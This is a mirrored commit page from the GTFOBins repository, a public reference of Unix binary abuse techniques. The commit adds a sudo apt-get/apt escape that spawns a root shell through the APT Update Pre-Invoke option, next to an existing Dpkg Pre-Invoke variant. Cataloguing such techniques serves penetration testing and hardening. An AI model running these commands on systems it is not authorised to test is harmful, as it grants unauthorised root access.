mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add alternative apt* shell technique
Thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ Also related to #38.
This commit is contained in:
parent
4fdaada820
commit
21f760676c
@ -15,4 +15,6 @@ functions:
|
|||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
|
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
|
||||||
sudo apt-get install -c $TF sl
|
sudo apt-get install -c $TF sl
|
||||||
|
- description: When the shell exits the `update` command is actually executed.
|
||||||
|
code: sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
|
||||||
---
|
---
|
||||||
|
@ -15,4 +15,6 @@ functions:
|
|||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
|
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
|
||||||
sudo apt install -c $TF sl
|
sudo apt install -c $TF sl
|
||||||
|
- description: When the shell exits the `update` command is actually executed.
|
||||||
|
code: sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user